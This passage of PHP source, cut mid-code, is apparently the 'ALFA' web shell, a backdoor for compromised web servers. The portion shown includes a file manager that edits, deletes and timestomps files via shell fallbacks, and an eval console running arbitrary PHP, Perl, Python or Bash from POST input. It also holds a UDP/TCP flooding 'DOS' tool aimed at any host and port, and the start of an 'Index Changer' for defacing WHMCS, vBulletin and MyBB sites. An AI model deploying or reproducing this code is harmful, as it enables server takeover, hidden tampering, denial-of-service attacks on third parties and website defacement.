\'".$slashed_alfa1."\' ]]; then echo main_green_perm; elif [[ -r \'".$slashed_alfa1."\' ]]; then echo main_white_perm; else echo main_red_perm; fi");\r\n\t}\r\n}\r\nif($_POST[\'alfa2\'] == \'auto\'){\r\nif(is_array(@getimagesize($_POST[\'alfa1\']))){\r\n$_POST[\'alfa2\'] = \'image\';\r\n}else{\r\n\t$_POST[\'alfa2\'] = \'view\';\r\n\tif($chdir_fals){\r\n\t\tif($alfa_canruncmd){\r\n\t\t\t$mime = explode(":", alfaEx("file --mime-type \'".addslashes($_POST[\'alfa1\'])."\'"));\r\n\t\t\t$mimetype = $mime[1];\r\n\t\t\tif(!empty($mimetype)){\r\n\t\t\t\tif(strstr($mimetype, "image")){\r\n\t\t\t\t\t$_POST[\'alfa2\'] = \'image\';\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\n}\r\nif($_POST[\'alfa2\'] == "rename" && !empty($_POST[\'alfa3\']) && @is_writable($_POST[\'alfa1\'])){$rename_cache = $_POST[\'alfa3\'];}\r\nif(@$_POST[\'alfa2\'] == \'mkfile\'){\r\n$_POST[\'alfa1\'] = trim($_POST[\'alfa1\']);\r\nif($chdir_fals&&$alfa_canruncmd){\r\n\tif(_alfa_is_writable($_POST["c"])){\r\n\t\talfaEx("cd \'".addslashes($_POST["c"])."\';touch \'".addslashes($alfa1_decoded)."\'");\r\n\t\t$_POST[\'alfa2\'] = "edit";\r\n\t}\r\n}\r\nif(!@file_exists($_POST[\'alfa1\'])){\r\n$fp = @fopen($_POST[\'alfa1\'], \'w\');\r\nif($fp){\r\n$_POST[\'alfa2\'] = "edit";\r\nfclose($fp);\r\n}\r\n}else{\r\n$_POST[\'alfa2\'] = "edit";\r\n}\r\n}\r\nif(!_alfa_file_exists(@$_POST[\'alfa1\'])){\r\necho __pre()."<center><p><div class=\\"txtfont\\"><font color=\'red\'>!...FILE DOEST NOT EXITS...!</font></div></p></center></div><script>editor_error=false;removeHistory(\'".$_POST[\'alfa4\']."\');</script>";\r\nalfaFooter();\r\nreturn;\r\n}\r\nif($chdir_fals){\r\n$filesize = $file_info[3];\r\n$uid["name"] = $file_info[1];\r\n$gid["name"] = $file_info[2];\r\n$permcolor = alfaPermsColor(array("class"=>$perm_color_class,"num"=>$file_info[5],"human"=>$file_info[6]),true);\r\n}else{\r\n$uid = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($_POST[\'alfa1\'])):\'\';\r\n$gid = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($_POST[\'alfa1\'])):\'\';\r\nif(!$uid&&!$gid){\r\n$uid[\'name\'] = function_exists("fileowner")?@fileowner($_POST[\'alfa1\']):\'\';\r\n$gid[\'name\'] = function_exists("filegroup")?@filegroup($_POST[\'alfa1\']):\'\';\r\n}\r\n$permcolor = alfaPermsColor($_POST[\'alfa1\']);\r\n$filesize = @filesize($_POST[\'alfa1\']);\r\nif(!isset($uid[\'name\'],$gid[\'name\'])||empty($uid[\'name\'])||empty($gid[\'name\'])){\r\n\tif(_alfa_can_runCommand()){\r\n\t\tlist($uid[\'name\'],$gid[\'name\']) = explode(":", alfaEx(\'stat -c "%U:%G" "\'.addslashes($_POST["c"]."/".$_POST["alfa1"]).\'"\'));\r\n\t}\r\n}\r\n}\r\nif(substr($_POST[\'alfa1\'], 0, 7) == "phar://"){\r\n\t$alfa_file_directory = $_POST[\'alfa1\'];\r\n}else{\r\n\t$alfa_file_directory = str_replace("//", "/",($chdir_fals?"":$_POST[\'c\'].\'/\').$_POST[\'alfa1\']);\r\n}\r\necho \'<div style="overflow: hidden;white-space: nowrap;text-overflow: ellipsis;"><span class="editor_file_info_vars">Name:</span> \'.htmlspecialchars(basename($alfa1_decoded)).\' <span class="editor_file_info_vars">Size:</span> \'.alfaSize($filesize).\' <span class="editor_file_info_vars">Permission:</span> \'.$permcolor.\' <span class="editor_file_info_vars">Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\' <span class="editor_file_info_vars">Directory:</span> \'.dirname($alfa_file_directory).\'</div>\';\r\nif(empty($_POST[\'alfa2\']))$_POST[\'alfa2\'] = \'view\';\r\nif(!_alfa_is_dir($_POST[\'alfa1\'])){\r\n$m = array(\'View\', \'Download\', \'Highlight\', \'Chmod\', \'Rename\', \'Touch\', \'Delete\', \'Image\', \'Hexdump\');\r\n$ftype = "file";\r\n}else{\r\n$m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n$ftype = "dir";\r\n}\r\necho(\'<div>\');\r\nforeach($m as $v)\r\necho $v == \'Delete\' ? \'<a href="javascript:void(0);" onclick="var chk=confirm(\\\'Are You Sure For Delete This File ?\\\');chk?editor(\\\'\'.addslashes(!isset($rename_cache)?$_POST[\'alfa1\']:$rename_cache).\'\\\',\\\'\'.strtolower($v).\'\\\',\\\'\\\',\\\'\'.$_POST[\'c\'].\'\\\',\\\'\'.$_POST[\'alfa4\'].\'\\\',\\\'\'.$ftype.\'\\\'):\\\'\\\';"><span class="editor_actions">\'.((strtolower($v)==@$_POST[\'alfa2\'])?\'<b><span class="editor_actions"> \'.$v.\' </span> </b>\':$v).\' | </span></a> \' : \'<a href="javascript:void(0);" onclick="editor(\\\'\'.addslashes(!isset($rename_cache)?$_POST[\'alfa1\']:$rename_cache).\'\\\',\\\'\'.strtolower($v).\'\\\',\\\'\\\',\\\'\'.$_POST[\'c\'].\'\\\',\\\'\'.$_POST[\'alfa4\'].\'\\\',\\\'\'.$ftype.\'\\\')"><span class="editor_actions">\'.((strtolower($v)==@$_POST[\'alfa2\'])?\'<b><span class="editor_actions"> \'.$v.\' </span> </b>\':$v).\' | </span></a>\';\r\necho \'</div>\';\r\nswitch($_POST[\'alfa2\']){\r\ncase \'view\':case \'edit\':\r\n@chdir($_POST[\'c\']);\r\n$disabled_btn = "";\r\nif(!@is_writable($_POST[\'alfa1\'])&&!_alfa_is_writable($_POST[\'alfa1\'])){\r\n$disabled_btn = "disabled=disabled";\r\n$disabled_btn_style= \'background: #ff0000;color: #fff;\';\r\n}\r\nif(!empty($_POST[\'alfa3\'])){\r\n$_POST[\'alfa3\'] = substr($_POST[\'alfa3\'],1);\r\n$time = @filemtime($_POST[\'alfa1\']);\r\n$fp = @__write_file($_POST[\'alfa1\'],$_POST[\'alfa3\']);\r\nif($chdir_fals&&$alfa_canruncmd){\r\n\t$rname = $alfa1_decoded;\r\n\t$randname = $rname.rand(111,9999);\r\n\t$filepath = dirname($_SERVER["SCRIPT_FILENAME"])."/".$randname;\r\n\tif($fp = @__write_file($filepath ,$_POST[\'alfa3\'])){\r\n\t\talfaEx("mv \'".addslashes($filepath)."\' \'".addslashes($_POST["alfa1"])."\';rm -f \'".addslashes($filepath)."\'");\r\n\t}\r\n}\r\nif($fp){\r\necho \'Saved!<br>\';\r\n@touch($_POST[\'alfa1\'],$time,$time);\r\n}\r\n}\r\necho \'<div class="editor-view"><div class="view-content editor-ace-controller"><div style="display:inline-block;">\'._alfa_load_ace_options("editor").\'<button style="border-radius:10px;" class="button ace-controler" onClick="copyToClipboard(this);">Copy</button> <button class="button ace-controler" onclick="alfaAceToFullscreen(this);">Full Screen</button> <button onclick="var ace_val = alfa_ace_editors.editor[this.getAttribute(\\\'ace_id\\\')].getValue();editor(\\\'\'.addslashes($alfa1_decoded).\'\\\',\\\'edit\\\',\\\'1\\\'+ace_val,\\\'\'.$_POST[\'c\'].\'\\\',\\\'\'.$_POST[\'alfa4\'].\'\\\',\\\'\'.$ftype.\'\\\');return false;" class="button ace-controler ace-save-btn" style="width: 100px;height: 33px;\'.$disabled_btn_style.\'" \'.$disabled_btn.\'>save</button></div><pre class="ml1 view_ml_content">\';\r\necho htmlspecialchars(__read_file($_POST[\'alfa1\']));\r\necho \'</pre></div></div>\';\r\nbreak;\r\ncase \'highlight\':\r\n@chdir($_POST[\'c\']);\r\nif(@is_readable($_POST[\'alfa1\'])){\r\necho \'<div class="editor-view"><div class="view-content"><div class="ml1" style="background-color: #e1e1e1;color:black;">\';\r\n$code = @highlight_file($_POST[\'alfa1\'],true);\r\necho str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div></div></div>\';\r\n}\r\nbreak;\r\ncase \'delete\':\r\n@chdir($_POST[\'c\']);\r\nif(@is_writable($_POST[\'alfa1\'])||$GLOBALS["glob_chdir_false"]){\r\n$deleted = true;\r\nif(!@unlink($_POST[\'alfa1\'])){\r\n\t$deleted = false;\r\n\tif($alfa_canruncmd){\r\n\t\tif(_alfa_is_writable($_POST[\'alfa1\'])){\r\n\t\t\talfaEx("rm -f \'".addslashes($_POST[\'alfa1\'])."\'");\r\n\t\t\t$deleted = true;\r\n\t\t}\r\n\t}\r\n}\r\nif($deleted)echo \'File Deleted...<script>var elem = $("\'.$_POST[\'alfa4\'].\'").parentNode;elem.parentNode.removeChild(elem);delete editor_files["\'.$_POST[\'alfa4\'].\'"];</script>\';else echo \'Error...\';}\r\nbreak;\r\ncase \'chmod\':\r\n@chdir($_POST[\'c\']);\r\nif(!empty($_POST[\'alfa3\'])){\r\n$perms = 0;\r\nfor($i=strlen($_POST[\'alfa3\'])-1;$i>=0;--$i)\r\n$perms += (int)$_POST[\'alfa3\'][$i]*pow(8, (strlen($_POST[\'alfa3\'])-$i-1));\r\nif(!@chmod($_POST[\'alfa1\'], $perms)){\r\nif($chdir_fals&&$alfa_canruncmd){\r\nalfaEx("cd \'".addslashes($_POST["c"])."\';chmod ".addslashes($_POST[\'alfa3\'])." \'".addslashes($alfa1_decoded)."\'");\r\necho(\'Success!\');\r\n}else{\r\necho \'<font color="#FFFFFF"><b>Can\\\'t set permissions!</b></font><br><script>document.mf.alfa3.value="";</script>\';}\r\n}else{echo(\'Success!\');}\r\n}\r\nclearstatcache();\r\nAlfaNum(8,9,10,7,6,5,4,2,1);\r\nif($chdir_fals){\r\n\t$file_perm = $file_info[5];\r\n}else{\r\n\t$file_perm = substr(sprintf(\'%o\', @fileperms($_POST[\'alfa1\'])),-4);\r\n}\r\necho \'<script>alfa3_="";</script><form onsubmit="editor(\\\'\'.addslashes($_POST[\'alfa1\']).\'\\\',\\\'\'.$_POST[\'alfa2\'].\'\\\',this.chmod.value,\\\'\'.$_POST[\'c\'].\'\\\',\\\'\'.$_POST[\'alfa4\'].\'\\\',\\\'\'.$ftype.\'\\\');return false;"><input type="text" name="chmod" value="\'.$file_perm.\'"><input type=submit value=" "></form>\';\r\nbreak;\r\ncase \'hexdump\':\r\n@chdir($_POST[\'c\']);\r\n$c = __read_file($_POST[\'alfa1\']);\r\n$n = 0;\r\n$h = array(\'00000000<br>\',\'\',\'\');\r\n$len = strlen($c);\r\nfor ($i=0; $i<$len; ++$i) {\r\n$h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\nswitch ( ord($c[$i]) ) {\r\ncase 0: $h[2] .= \' \'; break;\r\ncase 9: $h[2] .= \' \'; break;\r\ncase 10: $h[2] .= \' \'; break;\r\ncase 13: $h[2] .= \' \'; break;\r\ndefault: $h[2] .= $c[$i]; break;\r\n}\r\n$n++;\r\nif ($n == 32) {\r\n$n = 0;\r\nif ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';}\r\n$h[1] .= \'<br>\';\r\n$h[2] .= "\\n";\r\n}\r\n}\r\necho \'<div class="editor-view"><div class="view-content"><table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table></div></div>\';\r\nbreak;\r\ncase \'rename\':\r\n@chdir($_POST[\'c\']);\r\n$alfa1_escape = addslashes($_POST["alfa1"]);\r\n$alfa3_escape = addslashes($_POST["alfa3"]);\r\nif(!empty($_POST[\'alfa3\'])){\r\n$cmd_rename = false;\r\nif($chdir_fals&&$alfa_canruncmd){\r\nif(_alfa_is_writable($_POST[\'alfa1\'])){\r\n$alfa1_escape = addslashes($alfa1_decoded);\r\nalfaEx("cd \'".addslashes($_POST[\'c\'])."\';mv \'".$alfa1_escape."\' \'".addslashes($_POST[\'alfa3\'])."\'");\r\n}else{\r\n$cmd_rename = true;\r\n}\r\n}else{\r\n$alfa1_escape = addslashes($_POST["alfa1"]);\r\n}\r\nif(!@rename($_POST[\'alfa1\'], $_POST[\'alfa3\'])&&$cmd_rename){\r\necho \'Can\\\'t rename!<br>\';}else{echo(\'Renamed!<script>try{$("\'.$_POST[\'alfa4\'].\'").innerHTML = "<div class=\\\'editor-icon\\\'>"+loadType(\\\'\'.$alfa3_escape.\'\\\',\\\'\'.$ftype.\'\\\',\\\'\'.$_POST[\'alfa4\'].\'\\\')+"</div><div class=\\\'editor-file-name\\\'>\'.$alfa3_escape.\'</div>";editor_files["\'.$_POST[\'alfa4\'].\'"].file = "\'.$alfa3_escape.\'";updateFileEditor("\'.$alfa1_escape.\'", "\'.$alfa3_escape.\'");\'.($ftype == "dir"?"updateDirsEditor(\'".$_POST[\'alfa4\']."\',\'".$alfa1_escape."\');":"").\'}catch(e){console.log(e)}</script>\');$alfa1_escape = $alfa3_escape;}\r\n}\r\necho \'<form onsubmit="editor(\\\'\'.$alfa1_escape.\'\\\',\\\'\'.$_POST[\'alfa2\'].\'\\\',this.name.value,\\\'\'.$_POST[\'c\'].\'\\\',\\\'\'.$_POST[\'alfa4\'].\'\\\',\\\'\'.$ftype.\'\\\');return false;"><input type="text" name="name" value="\'.addslashes(htmlspecialchars(isset($_POST[\'alfa3\'])&&$_POST[\'alfa3\']!=\'\'?$_POST[\'alfa3\']:$alfa1_decoded)).\'"><input type=submit value=" "></form>\';\r\nbreak;\r\ncase \'touch\':\r\n@chdir($_POST[\'c\']);\r\nif( !empty($_POST[\'alfa3\']) ) {\r\n$time = strtotime($_POST[\'alfa3\']);\r\nif($time){\r\n$touched = false;\r\nif($chdir_fals&&$alfa_canruncmd){\r\n\talfaEx("cd \'".addslashes($_POST["c"])."\';touch -d \'".htmlspecialchars(addslashes($_POST[\'alfa3\']))."\' \'".addslashes($alfa1_decoded)."\'");\r\n\t$touched = true;\r\n}\r\nif(!@touch($_POST[\'alfa1\'],$time,$time)&&!$touched)\r\necho \'Fail!\';\r\nelse\r\necho \'Touched!\';\r\n} else echo \'Bad time format!\';\r\n}\r\nclearstatcache();\r\necho \'<script>alfa3_="";</script><form onsubmit="editor(\\\'\'.addslashes($_POST[\'alfa1\']).\'\\\',\\\'\'.$_POST[\'alfa2\'].\'\\\',this.touch.value,\\\'\'.$_POST[\'c\'].\'\\\',\\\'\'.$_POST[\'alfa4\'].\'\\\',\\\'\'.$ftype.\'\\\');return false;"><input type=text name=touch value="\'.date("Y-m-d H:i:s", ($chdir_fals?$file_info[4]:@filemtime($_POST[\'alfa1\']))).\'"><input type=submit value=" "></form>\';\r\nbreak;\r\ncase \'image\':\r\n@chdir($_POST[\'c\']);\r\necho(\'<hr>\');\r\n$file = $_POST[\'alfa1\'];\r\n$image_info = @getimagesize($file);\r\nif(is_array($image_info)||$chdir_fals){\r\n$width = (int)$image_info[0];\r\n$height = (int)$image_info[1];\r\nif($chdir_fals&&$alfa_canruncmd){\r\n\t$source = alfaEx("cat \'".addslashes($file)."\' | base64");\r\n\tlist($width, $height) = explode(":", alfaEx("identify -format \'%w:%h\' \'".addslashes($file)."\'"));\r\n\t$mime = explode(":", alfaEx("file --mime-type \'".addslashes($file)."\'"));\r\n\t$image_info[\'mime\'] = $mime[1];\r\n}else{\r\n\t$source = __ZW5jb2Rlcg(__read_file($file, false));\r\n}\r\n$image_info_h = "Image type = <span>[</span> ".$image_info[\'mime\']." <span>]</span><br>Image Size = <span>[ </span>".$width." x ".$height."<span> ]</span><br>";\r\nif($width > 800){$width = 800;}\r\necho $content = "<div class=\'editor-view\'><div class=\'view-content\'><center>".$image_info_h."<br><img id=\'viewImage\' style=\'max-width:100%;border:1px solid green;\' src=\'data:".$image_info[\'mime\'].";base64,".$source."\' alt=\'".$file."\'></center></div></div><br>";\r\n}\r\nbreak;\r\n}\r\necho \'</div>\';\r\nalfaFooter();\r\n}\r\nfunction findicon($file,$type){\r\n$s = \'http://solevisible.com/icons/\';\r\n$types = array(\'json\',\'ppt\',\'pptx\',\'xls\',\'xlsx\',\'msi\',\'config\',\'cgi\',\'pm\',\'c\',\'cpp\',\'cs\',\'java\',\'aspx\',\'asp\',\'db\',\'ttf\',\'eot\',\'woff\',\'woff2\',\'woff\',\'conf\',\'log\',\'apk\',\'cab\',\'bz2\',\'tgz\',\'dmg\',\'izo\',\'jar\',\'7z\',\'iso\',\'rar\',\'bat\',\'sh\',\'alfa\',\'gz\',\'tar\',\'php\',\'php4\',\'php5\',\'phtml\',\'html\',\'xhtml\',\'shtml\',\'htm\',\'zip\',\'png\',\'jpg\',\'jpeg\',\'gif\',\'bmp\',\'ico\',\'txt\',\'js\',\'rb\',\'py\',\'xml\',\'css\',\'sql\',\'htaccess\',\'pl\',\'ini\',\'dll\',\'exe\',\'mp3\',\'mp4\',\'m4a\',\'mov\',\'flv\',\'swf\',\'mkv\',\'avi\',\'wmv\',\'mpg\',\'mpeg\',\'dat\',\'pdf\',\'3gp\',\'doc\',\'docx\',\'docm\');\r\nif($type!=\'file\'){\r\nreturn ($file==\'..\'?$s.\'back.png\':$s.\'folder.png\');\r\n}else{\r\n$ext = explode(\'.\',$file);\r\n$ext = end($ext);\r\n$ext = strtolower($ext);\r\nreturn (in_array($ext,$types)?$s.$ext.\'.png\':$s.\'notfound.png\');\r\n}\r\n}\r\nfunction alfadlfile(){\r\nif(isset($_POST[\'c\'],$_POST[\'file\'])){\r\n$basename = rawurldecode(basename($_POST[\'file\']));\r\n$_POST[\'file\'] = str_replace("//", "/", $_POST[\'c\'].\'/\'.$basename);\r\n$alfa_canruncmd = _alfa_can_runCommand(true,true);\r\nif(@is_file($_POST[\'file\']) && @is_readable($_POST[\'file\']) || $alfa_canruncmd){\r\nob_start("ob_gzhandler", 4096);\r\nheader("Content-Disposition: attachment; filename=\\"".addslashes($basename)."\\"");\r\nheader("Content-Type: application/octet-stream");\r\nif($GLOBALS["glob_chdir_false"]){\r\n\t$randname = $basename.rand(111,9999);\r\n\t$scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);\r\n\t$filepath = $scriptpath."/".$randname;\r\n\tif(_alfa_is_writable($scriptpath)){\r\n\t\talfaEx("cp \'".addslashes($_POST["file"])."\' \'".addslashes($filepath)."\'");\r\n\t\treadfile($filepath);\r\n\t\t@unlink($filepath);\r\n\t}else{\r\n\t\talfaEx("cat \'".addslashes($_POST["file"])."\'");\r\n\t}\r\n}else{\r\n\treadfile($_POST[\'file\']);\r\n}\r\n}else echo(\'Error...!\');}}\r\nfunction __alfa_set_cookie($key, $value){\r\n\t$_COOKIE[$key] = $value;\r\n\t@setcookie($key, $value, time()+(86400 * 7), \'/\');\r\n}\r\nfunction alfaphpeval(){\r\nif(isset($_COOKIE["eval_tmpdir"])&&@is_dir($_COOKIE["eval_tmpdir"])){\r\n\t$tempdir = __ZGVjb2Rlcg($_COOKIE["eval_tmpdir"]);\r\n}else{\r\n\t$tempdir = dirname(alfaEx("mktemp"));\r\n\t__alfa_set_cookie("eval_tmpdir", __ZW5jb2Rlcg($tempdir));\r\n}\r\nalfahead();\r\nif(isset($_POST[\'alfa2\']) && ($_POST[\'alfa2\'] == \'ini\')){\r\necho \'<div class=header>\';\r\nob_start();\r\n$INI=ini_get_all();\r\nprint \'<table border=0><tr>\'\r\n.\'<td class="listing"><font class="highlight_txt">Param</td>\'\r\n.\'<td class="listing"><font class="highlight_txt">Global value</td>\'\r\n.\'<td class="listing"><font class="highlight_txt">Local Value</td>\'\r\n.\'<td class="listing"><font class="highlight_txt">Access</td></tr>\';\r\nforeach ($INI as $param => $values)\r\nprint "\\n".\'<tr>\'\r\n.\'<td class="listing"><b>\'.$param.\'</td>\'\r\n.\'<td class="listing">\'.$values[\'global_value\'].\' </td>\'\r\n.\'<td class="listing">\'.$values[\'local_value\'].\' </td>\'\r\n.\'<td class="listing">\'.$values[\'access\'].\' </td></tr>\';\r\n$tmp = ob_get_clean();\r\n$tmp = preg_replace(\'!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU\',\'\',$tmp);\r\n$tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\necho str_replace(\'<h1\',\'<h2\', $tmp) .\'</div><br>\';\r\n}\r\nif(isset($_POST[\'alfa2\']) && ($_POST[\'alfa2\'] == \'info\')) {\r\necho \'<div class=header><style>.p {color:#000;}</style>\';\r\nob_start();\r\nphpinfo();\r\n$tmp = ob_get_clean();\r\n$tmp = preg_replace(\'!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU\',\'\',$tmp);\r\n$tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\necho str_replace(\'<h1\',\'<h2\', $tmp) .\'</div><br>\';\r\n}\r\nif(isset($_POST[\'alfa2\']) && ($_POST[\'alfa2\'] == \'exten\')) {\r\necho \'<div class=header>\';\r\nob_start();\r\n$EXT=get_loaded_extensions();\r\necho \'<table border=0><tr><td class="listing">\'.implode(\'</td></tr>\'."\\n".\'<tr><td class="listing">\', $EXT).\'</td></tr></table>\'.count($EXT).\' extensions loaded\';\r\necho \'</div><br>\';\r\n}\r\n$lang_html = "";\r\nforeach(array("php"=>"php ~> [ Windows / Linux ]","perl"=>"perl ~> [ Linux ]","python"=>"python ~> [ Linux ]","bash"=>"bash ~> [ Linux ]") as $key=>$val){$lang_html .= \'<option value="\'.$key.\'" \'.($_POST["alfa3"]==$key?"selected":"").\'>\'.$val.\'</option>\';}\r\necho \'<div class=header><Center><a href=javascript:void(0) onclick="g(\\\'phpeval\\\',null,\\\'\\\',\\\'ini\\\')">| INI_INFO | </a><a href=javascript:void(0) onclick="g(\\\'phpeval\\\',null,\\\'\\\',\\\'info\\\')"> | phpinfo |</a><a href=javascript:void(0) onclick="g(\\\'phpeval\\\',null,\\\'\\\',\\\'exten\\\')"> | extensions |</a></center><br><form class="php-evals" name="pf" method="post" onsubmit="var ace_value=geEvalAceValue(this);g(\\\'phpeval\\\',null,ace_value,null,this.language.value); return false;"><div class="txtfont">Select Language: </div> <select name="language" style="width:300px;">\'.$lang_html.\'</select>\'._alfa_load_ace_options("eval").\'<br><br><div class="bigarea" style="position:relative;"><div class="php-evals-ace">\'.(!empty($_POST[\'alfa1\'])?htmlspecialchars($_POST[\'alfa1\']):"&lt;?php\\n\\n\\techo(\'hello alfa !\');\\n\\n?>").\'</div></div><center><input type="submit" value="" style="margin-top:5px"></center>\';\r\necho \'</form><pre id="PhpOutput" style="\'.(empty($_POST[\'alfa1\'])?\'display:none;\':\'\').\'margin-top:5px;" class="ml1">\';\r\nif(!empty($_POST[\'alfa1\'])){\r\nif($_POST[\'alfa3\']=="php"){\r\nob_start();\r\neval(\'?>\'.$_POST[\'alfa1\']);\r\n$result = htmlspecialchars(ob_get_clean());\r\n}elseif(_alfa_can_runCommand()&&$GLOBALS["sys"]=="unix"){\r\n\t$lang = $_POST[\'alfa3\'];\r\n\t$filename = "temp".rand(11111,99999);\r\n\t$temp = $tempdir."/".$filename ;\r\n\t__write_file($filename, $_POST[\'alfa1\']);\r\n\t$result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");\r\n\t@unlink($filename);\r\n\t@unlink($temp);\r\n}\r\necho \'<textarea class="bigarea">\'.$result.\'</textarea>\';\r\n}\r\necho \'</pre></div>\';\r\nalfafooter();\r\n}\r\nfunction alfahash(){\r\nif(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));}}\r\nif(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';for($i=0;$i<strlen($p);++$i)$r.= \'%\'.dechex(ord($p[$i]));return strtoupper($r);}}\r\n$stringTools = array(\r\n\'Base64_encode ( $string )\' => \'__ZW5jb2Rlcg($s)\',\r\n\'Base64_decode ( $string )\' => \'__ZGVjb2Rlcg($s)\',\r\n\'strrev ( $string )\' => \'strrev($s)\',\r\n\'bin2hex ( $string )\' => \'bin2hex($s)\',\r\n\'hex2bin ( $string )\' => \'hex2bin($s)\',\r\n\'md5 ( $string )\' => \'md5($s)\',\r\n\'sha1 ( $string )\' => \'sha1($s)\',\r\n\'hash ( "sha251", $string ) --> sha251\' => \'hash("sha256",$s)\',\r\n\'hash ( "sha384", $string ) --> sha384\' => \'hash("sha384",$s)\',\r\n\'hash ( "sha512", $string ) --> sha512\' => \'hash("sha512",$s)\',\r\n\'crypt ( $string )\' => \'crypt($s)\',\r\n\'crc32 ( $string )\' => \'crc32($s)\',\r\n\'str_rot13 ( $string )\' => \'str_rot13($s)\',\r\n\'urlencode ( $string )\' => \'urlencode($s)\',\r\n\'urldecode  ( $string )\' => \'urldecode($s)\',\r\n\'full_urlencode  ( $string )\' => \'full_urlencode($s)\',\r\n\'htmlspecialchars  ( $string )\' => \'htmlspecialchars($s)\',\r\n\'base64_encode (gzdeflate( $string , 9)) --> Encode\' => \'__ZW5jb2Rlcg(gzdeflate($s, 9))\',\r\n\'gzinflate (base64_decode( $string )) --> Decode\' => \'@gzinflate(__ZGVjb2Rlcg($s))\',\r\n\'str_rot13 (base64_encode( $string )) --> Encode\' => \'str_rot13(__ZW5jb2Rlcg($s))\',\r\n\'base64_decode (str_rot13( $string )) --> Decode\' => \'__ZGVjb2Rlcg(str_rot13($s))\',\r\n\'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode\' => \'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))\',\r\n\'gzinflate (base64_decode(str_rot13( $string ))) --> Decode\' => \'@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))\',\r\n);\r\nalfahead();\r\necho \'<div class=header>\';\r\necho "<form onSubmit=\'g(\\"hash\\",null,this.selectTool.value,this.input.value);return false;\'><div class=\'txtfont\'>Method:</div> <select name=\'selectTool\' style=\'width:400px;\'>";\r\nforeach($stringTools as $k => $v)\r\necho "<option value=\'".htmlspecialchars($v)."\' ".($_POST[\'alfa1\']==$v?\'selected\':\'\').">".$k."</option>";\r\necho "</select> <input type=\'submit\' value=\' \'/><br><textarea  name=\'input\' style=\'margin-top:5px\' class=\'bigarea\'>".(empty($_POST[\'alfa1\'])?\'\':htmlspecialchars(@$_POST[\'alfa2\']))."</textarea></form>";\r\nif(!empty($_POST[\'alfa1\'])){\r\n$string = addslashes($_POST[\'alfa2\']);\r\n$string = str_replace(\'\\"\',\'"\',$string);\r\n$alg = $_POST[\'alfa1\'];\r\n$code = str_replace(\'$s\',"\'".$string."\'",$alg);\r\nob_start();\r\neval(\'echo \'.$code.\';\');\r\n$res = ob_get_contents();\r\nob_end_clean();\r\nif(in_array($alg, $stringTools))echo \'<textarea class="bigarea">\'.htmlspecialchars($res).\'</textarea>\';\r\n}\r\necho "</div>";\r\nalfaFooter();\r\n}\r\nfunction alfados(){\r\nalfahead();\r\necho \'<div class=header>\';\r\necho \'<center><p><div class="txtfont_header">| DOS |</div></p><form onSubmit="g(\\\'dos\\\',null,this.host.value,this.time.value,this.port.value,this.m.value); return false;"><div class="txtfont">Method : <select name="m" style="width:80px;"><option value="udp">UDP</option><option value="tcp">TCP</option></select> Host : <input name="host" type="text" value="localhost" size="25" /> Time : <input name="time" type="text" size="15" /> Port : <input name="port" type="text" size="10" /> <input type="submit" value=" " /></div></form></center><br>\';\r\nif(!empty($_POST[\'alfa1\']) && !empty($_POST[\'alfa2\']) && !empty($_POST[\'alfa3\'])){\r\necho __pre();\r\n$packets=0;\r\nignore_user_abort(true);\r\n$exec_time=(int)$_POST[\'alfa2\'];\r\n$time=time();\r\n$max_time=$exec_time+$time;\r\n$host=$_POST[\'alfa1\'];\r\n$port=(int)$_POST[\'alfa3\'];\r\n$method=$_POST[\'alfa4\'];\r\n$out = str_repeat(\'X\',65000);\r\nwhile(1){\r\n$packets++;\r\nif(time() > $max_time){\r\nbreak;\r\n}\r\n$fp = @fsockopen($method.\'://\'.$host, $port, $errno, $errstr, 5);\r\nif($fp){\r\nfwrite($fp, $out);\r\nfclose($fp);\r\n}\r\n}\r\necho "<center>$packets (" . @round(($packets*65)/1024, 2) . " MB) packets averaging ". @round($packets/$exec_time, 2) . " packets per second</center>";\r\necho "</pre>";\r\n}\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction __pre(){return(\'<pre id="strOutput" style="margin-top:5px" class="ml1">\');}\r\nfunction alfaIndexChanger(){\r\nalfahead();\r\n\r\necho \'<div class=header><center><p><div class="txtfont_header">| Index Changer |</div></p><h3><a href=javascript:void(0) onclick="g(\\\'IndexChanger\\\',null,null,null,\\\'whmcs\\\')">| Whmcs | </a><a href=javascript:void(0) onclick="g(\\\'IndexChanger\\\',null,\\\'vb\\\',null)">| vBulletin | </a><a href=javascript:void(0) onclick="g(\\\'IndexChanger\\\',null,null,\\\'mybb\\\')">| MyBB | </a></h3></center>\';\r\nif(isset($_POST[\'alfa3\'])&&($_POST[\'alfa3\'] == \'whmcs\')){\r\necho __pre();\r\n\r\necho "<center><center><div class=\'txtfont_header\'>| Whmcs |</div>\r\n<p><center>".getConfigHtml(\'whmcs\')."<form onSubmit=\\"g(\'IndexChanger\',null,null,null,\'whmcs\',this.fname.value,this.path.value,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value); return false;\\">\r\n";\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', 